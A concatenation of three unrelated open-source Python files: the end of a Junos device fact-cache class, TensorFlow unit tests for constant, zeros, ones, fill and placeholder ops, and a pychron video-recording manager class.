:returns length: of all of the facts we know how to gather,
regardless of whether or not they've already been cached.
"""
return len(self._callbacks)
def __str__(self):
"""
A string representation of the facts dictionary.
:returns string: a string representation of the dictionary.
Because this returns the value of every fact, it has the
side-effect of causing any ungathered facts to be gathered and then
cached.
"""
string = ''
for key in sorted(self):
if not key.startswith('_'):
current = "'%s': %s" % (key, repr(self.get(key)))
if string:
string = ', '.join([string, current])
else:
string = current
return '{' + string + '}'
def __repr__(self):
"""
        A formatted string representation of the facts dictionary.
        :returns string: a formatted string representation of the dictionary.
Because this returns the value of every fact, it has the
side-effect of causing any ungathered facts to be gathered and then
cached.
"""
return pformat(dict(self))
def _refresh(self,
exception_on_failure=False,
warnings_on_failure=False,
keys=None):
"""
Empty the cache to force a refresh of one or more facts.
Empties the fact gathering cache for all keys (if keys == None) or a
set of keys. This causes the fact to be gathered and cached upon next
        access. If either exception_on_failure or warnings_on_failure is true,
then all facts are accessed by getting the string representation of the
facts. This causes all facts to immediately be populated so that any
exceptions or warnings are generated during the call to _refresh().
:param exception_on_failure: A boolean which indicates if an exception
should be raised upon a failure gathering facts.
        :param warnings_on_failure: A boolean which indicates if a warning
should be logged upon a failure gathering facts.
:param keys: A single key as a string, or an iterable of keys (such
            as a list, set, or tuple.) The specified keys are emptied from
the cache. If None, all keys are emptied from the cache.
:raises RuntimeError:
When keys contains an unknown fact.
"""
refresh_keys = None
if keys is not None:
            if isinstance(keys, str):
refresh_keys = (keys,)
else:
refresh_keys = keys
if refresh_keys is not None:
for key in refresh_keys:
if key in self._callbacks:
if key in self._cache:
del self._cache[key]
else:
                    raise RuntimeError('The %s fact cannot be refreshed. %s '
                                       'is not a known fact.' % (key, key))
else:
self._cache = dict()
if exception_on_failure or warnings_on_failure:
self._exception_on_failure = exception_on_failure
self._warnings_on_failure = warnings_on_failure
try:
_ = str(self._device.facts)
except Exception:
if exception_on_failure:
raise
finally:
if warnings_on_failure and self._should_warn:
warnings.warn('Facts gathering is incomplete. '
'To know the reason call '
'"dev.facts_refresh('
'exception_on_failure=True)"',
RuntimeWarning)
self._exception_on_failure = False
self._warnings_on_failure = False
self._should_warn = False
# Precede the class's documentation with the documentation on the specific
# facts from the jnpr.junos.facts package.
__doc__ = (facts_doc + "Implementation details on the _FactCache class:" +
__doc__)
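# Typical usage (a sketch), via the ``facts`` attribute of a connected
# jnpr.junos Device; the fact name below is illustrative:
#
#     value = dev.facts['hostname']       # gathered on first access, then cached
#     dev.facts_refresh(keys='hostname')  # empty the cache so it is re-gathered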
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ConstantOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class ConstantTest(test.TestCase):
def _testCpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=False):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testGpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=True):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testAll(self, x):
self._testCpu(x)
self._testGpu(x)
def testFloat(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float32))
self._testAll(np.empty((2, 0, 5)).astype(np.float32))
def testDouble(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float64))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float64))
self._testAll(np.empty((2, 0, 5)).astype(np.float64))
def testInt32(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int32))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int32))
self._testAll(np.empty((2, 0, 5)).astype(np.int32))
def testInt64(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int64))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int64))
self._testAll(np.empty((2, 0, 5)).astype(np.int64))
def testComplex64(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(np.empty((2, 0, 5)).astype(np.complex64))
def testComplex128(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(np.empty((2, 0, 5)).astype(np.complex128))
def testString(self):
self._testCpu(
np.array([compat.as_bytes(str(x)) for x in np.arange(-15, 15)]).reshape(
[2, 3, 5]))
self._testCpu(np.empty((2, 0, 5)).astype(np.str_))
def testStringWithNulls(self):
with self.test_session():
val = ops.convert_to_tensor(b"\0\0\0\0").eval()
self.assertEqual(len(val), 4)
self.assertEqual(val, b"\0\0\0\0")
with self.test_session():
val = ops.convert_to_tensor(b"xx\0xx").eval()
self.assertEqual(len(val), 5)
self.assertAllEqual(val, b"xx\0xx")
nested = [[b"\0\0\0\0", b"xx\0xx"], [b"\0_\0_\0_\0", b"\0"]]
with self.test_session():
val = ops.convert_to_tensor(nested).eval()
# NOTE(mrry): Do not use assertAllEqual, because it converts nested to a
# numpy array, which loses the null terminators.
self.assertEqual(val.tolist(), nested)
def testExplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32),
shape=[2, 3, 5])
self.assertEqual(c.get_shape(), [2, 3, 5])
def testImplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self.assertEqual(c.get_shape(), [2, 3, 5])
def testExplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[7])
self.assertEqual(c.get_shape(), [7])
def testImplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7])
self.assertEqual(c.get_shape(), [7])
def testExplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1, shape=[1])
self.assertEqual(c.get_shape(), [1])
def testImplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1)
self.assertEqual(c.get_shape(), [])
def testShapeInconsistent(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[10])
self.assertEqual(c.get_shape(), [10])
# pylint: disable=g-long-lambda
def testShapeWrong(self):
with ops.Graph().as_default():
with self.assertRaisesWithPredicateMatch(
ValueError,
lambda e: ("Too many elements provided. Needed at most 5, "
"but received 7" == str(e))):
constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[5])
# pylint: enable=g-long-lambda
def testTooLargeConstant(self):
with ops.Graph().as_default():
large_array = np.zeros((512, 1024, 1024), dtype=np.float32)
with self.assertRaisesRegexp(
ValueError,
"Cannot create a tensor proto whose content is larger than 2GB."):
c = constant_op.constant(large_array)
def testTooLargeGraph(self):
with ops.Graph().as_default() as g:
large_array = np.zeros((256, 1024, 1024), dtype=np.float32)
c = constant_op.constant(large_array)
d = constant_op.constant(large_array)
with self.assertRaisesRegexp(ValueError,
"GraphDef cannot be larger than 2GB."):
g.as_graph_def()
def testSparseValuesRaiseErrors(self):
with self.assertRaisesRegexp(ValueError,
"setting an array element with a sequence"):
c = constant_op.constant([[1, 2], [3]], dtype=dtypes_lib.int32)
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3]])
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3], [4, 5]])
class AsTensorTest(test.TestCase):
def testAsTensorForTensorInput(self):
with ops.Graph().as_default():
t = constant_op.constant(10.0)
x = ops.convert_to_tensor(t)
self.assertIs(t, x)
def testAsTensorForNonTensorInput(self):
with ops.Graph().as_default():
x = ops.convert_to_tensor(10.0)
self.assertTrue(isinstance(x, ops.Tensor))
def testAsTensorForShapeInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([], x.eval())
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = array_ops.reshape(
array_ops.zeros([6]), tensor_shape.TensorShape([2, 3]))
self.assertAllEqual([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], x.eval())
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape(None))
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64]))
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.float32)
def testAsTensorForDimensionInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3])[1])
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual(2, x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual(2, x.eval())
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape(None)[1])
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64])[1])
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.float32)
class IdentityOpTest(test.TestCase):
def testIdTensor(self):
with ops.Graph().as_default():
x = constant_op.constant(2.0, shape=[6], name="input")
id_op = array_ops.identity(x, name="id")
self.assertTrue(isinstance(id_op.op.inputs[0], ops.Tensor))
self.assertProtoEquals("name: 'id' op: 'Identity' input: 'input' "
"attr { key: 'T' value { type: DT_FLOAT } }",
id_op.op.node_def)
class ZerosTest(test.TestCase):
def _Zeros(self, shape):
with self.test_session():
ret = array_ops.zeros(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(
np.array_equal(self._Zeros([2, 3]), np.array([[0] * 3] * 2)))
def testScalar(self):
self.assertEqual(0, self._Zeros([]))
self.assertEqual(0, self._Zeros(()))
with self.test_session():
scalar = array_ops.zeros(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(0, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[0] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of zeros of the same dimensions as "d".
z = array_ops.zeros(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.zeros([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
# Test explicit type control
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64,
dtypes_lib.bool
]:
z = array_ops.zeros([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
class ZerosLikeTest(test.TestCase):
def _compareZeros(self, dtype, use_gpu):
with self.test_session(use_gpu=use_gpu):
# Creates a tensor of non-zero values with shape 2 x 3.
numpy_dtype = dtype.as_numpy_dtype
d = constant_op.constant(np.ones((2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.zeros_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[0] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testZerosLikeCPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
self._compareZeros(dtype, False)
def testZerosLikeGPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.bool, dtypes_lib.int64
]:
self._compareZeros(dtype, True)
def testZerosLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.zeros_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
def testZerosLikeDtype(self):
# Make sure zeros_like works even for dtypes that cannot be cast between
with self.test_session():
shape = (3, 5)
dtypes = np.float32, np.complex64
for in_type in dtypes:
x = np.arange(15).astype(in_type).reshape(*shape)
for out_type in dtypes:
y = array_ops.zeros_like(x, dtype=out_type).eval()
self.assertEqual(y.dtype, out_type)
self.assertEqual(y.shape, shape)
self.assertAllEqual(y, np.zeros(shape, dtype=out_type))
class OnesTest(test.TestCase):
def _Ones(self, shape):
with self.test_session():
ret = array_ops.ones(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(np.array_equal(self._Ones([2, 3]), np.array([[1] * 3] * 2)))
def testScalar(self):
self.assertEqual(1, self._Ones([]))
self.assertEqual(1, self._Ones(()))
with self.test_session():
scalar = array_ops.ones(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(1, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[1] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of ones of the same dimensions as "d".
z = array_ops.ones(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testAutoPack(self):
with self.test_session():
h = array_ops.placeholder(dtypes_lib.int32, shape=[])
w = array_ops.placeholder(dtypes_lib.int32, shape=[])
z = array_ops.ones([h, w])
out = z.eval(feed_dict={h: 4, w: 16})
self.assertAllEqual(out, np.array([[1] * 16] * 4))
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.ones([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = array_ops.ones(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
# Test explicit type control
for dtype in (dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128,
dtypes_lib.int64, dtypes_lib.bool):
z = array_ops.ones([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = array_ops.ones(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
class OnesLikeTest(test.TestCase):
def testOnesLike(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
numpy_dtype = dtype.as_numpy_dtype
with self.test_session():
# Creates a tensor of non-zero values with shape 2 x 3.
d = constant_op.constant(
np.ones(
(2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.ones_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[1] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testOnesLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.ones_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
class FillTest(test.TestCase):
def _compare(self, dims, val, np_ans, use_gpu):
with self.test_session(use_gpu=use_gpu):
tf_ans = array_ops.fill(dims, val, name="fill")
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
# Fill does not set the shape.
# self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, dims, val, np_ans):
self._compare(dims, val, np_ans, False)
self._compare(dims, val, np_ans, True)
def testFillFloat(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillDouble(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt32(self):
np_ans = np.array([[42] * 3] * 2).astype(np.int32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt64(self):
np_ans = np.array([[-42] * 3] * 2).astype(np.int64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillComplex64(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex64)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillComplex128(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex128)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillString(self):
np_ans = np.array([[b"yolo"] * 3] * 2)
with self.test_session(use_gpu=False):
tf_ans = array_ops.fill([2, 3], np_ans[0][0], name="fill").eval()
self.assertAllEqual(np_ans, tf_ans)
def testFillNegative(self):
with self.test_session():
      for shape in (-1,), (2, -1), (-1, 2), (-2,), (-3,):
with self.assertRaises(ValueError):
array_ops.fill(shape, 7)
# Using a placeholder so this won't be caught in static analysis.
dims = array_ops.placeholder(dtypes_lib.int32)
fill_t = array_ops.fill(dims, 3.0)
      for shape in (-1,), (2, -1), (-1, 2), (-2,), (-3,):
with self.assertRaises(errors_impl.InvalidArgumentError):
fill_t.eval({dims: shape})
def testShapeFunctionEdgeCases(self):
# Non-vector dimensions.
with self.assertRaises(ValueError):
array_ops.fill([[0, 1], [2, 3]], 1.0)
# Non-scalar value.
with self.assertRaises(ValueError):
array_ops.fill([3, 2], [1.0, 2.0])
# Partial dimension information.
f = array_ops.fill(array_ops.placeholder(dtypes_lib.int32, shape=(4,)), 3.0)
self.assertEqual([None, None, None, None], f.get_shape().as_list())
f = array_ops.fill(
[array_ops.placeholder(
dtypes_lib.int32, shape=()), 17], 1.0)
self.assertEqual([None, 17], f.get_shape().as_list())
def testGradient(self):
with self.test_session():
in_v = constant_op.constant(5.0)
out_shape = [3, 2]
out_filled = array_ops.fill(out_shape, in_v)
err = gradient_checker.compute_gradient_error(in_v, [], out_filled,
out_shape)
self.assertLess(err, 1e-3)
class PlaceholderTest(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
self.assertEqual(10, d.eval(feed_dict={p: 2}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder(dtypes_lib.float32, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder(dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderV2Test(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testUnknownShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
# can feed anything
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
feed_array = np.random.rand(4, 2, 5)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
def testScalarShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=[], name="p")
p_identity = array_ops.identity(p)
self.assertAllClose(p_identity.eval(feed_dict={p: 5}), 5)
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_v2(
dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
val = np.array(2).astype(np.int)
self.assertEqual(10, d.eval(feed_dict={p: val}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder_v2(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder_v2(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder_v2(
dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderWithDefaultTest(test.TestCase):
def testFullShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([[2, 2], [2, 2]], shape=[2, 2])
a = array_ops.identity(p)
self.assertAllEqual([[2, 2], [2, 2]], a.eval())
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[6, 6, 6], [6, 6, 6]]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([1, 2, 3], shape=[None])
a = array_ops.identity(p)
self.assertAllEqual([1, 2, 3], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[2, 2], [2, 2]]})
def testNoShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([17], shape=None)
a = array_ops.identity(p)
self.assertAllEqual([17], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
if __name__ == "__main__":
test.main()
|
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from __future__ import absolute_import
from traits.api import Instance, Float, Button, Int, Property, Event, Bool
from traitsui.api import View, Item, HGroup
# =============standard library imports ========================
from threading import Thread
# =============local library imports ==========================
from pychron.core.ui.stage_component_editor import VideoComponentEditor
from pychron.image.video import Video
from pychron.image.image import Image
from .manager import Manager
from pychron.canvas.canvas2D.video_canvas import VideoCanvas
from pychron.core.helpers.filetools import unique_path
from pychron.paths import paths
class VideoManager(Manager):
"""
"""
video = Instance(Video, ())
image = Instance(Image, ())
process = Button
# pause = Button
record = Event
record_label = Property(depends_on='is_recording')
is_recording = Bool
# record_button = Button('Record')
threshold = Float(99, auto_set=False, enter_set=True)
angle = Float(0, auto_set=False, enter_set=True)
erosion = Int(0, auto_set=False, enter_set=True)
dilation = Int(0, auto_set=False, enter_set=True)
x = Int(0, auto_set=False, enter_set=True)
y = Int(0, auto_set=False, enter_set=True)
canvas = Instance(VideoCanvas)
width = Int(640)
height = Int(480)
def open_video(self, **kw):
self.video.open(**kw)
def close_video(self, **kw):
self.video.close(**kw)
def shutdown(self):
self.video.shutdown()
def _get_record_label(self):
return 'Record' if not self.is_recording else 'Stop'
# def _pause_fired(self):
# self.canvas.pause = not self.canvas.pause
    def _record_fired(self):
        def _rec_():
            self.start_recording()
            # time.sleep(4)
            # self.stop_recording()
        if self.is_recording:
            self.is_recording = False
            self.stop_recording()
        else:
            self.is_recording = True
            # start the recording thread only when recording is being turned on
            t = Thread(target=_rec_)
            t.start()
def start_recording(self, path=None, use_dialog=False):
'''
'''
self.info('start video recording ')
if path is None:
if use_dialog:
path = self.save_file_dialog()
else:
path, _ = unique_path(paths.video_dir,
'vm_recording',
extension='avi')
self.info('saving recording to path {}'.format(path))
# self.start()
self.video.start_recording(path)
# time.sleep(5)
# self.stop_recording()
def stop_recording(self):
'''
'''
self.info('stop video recording')
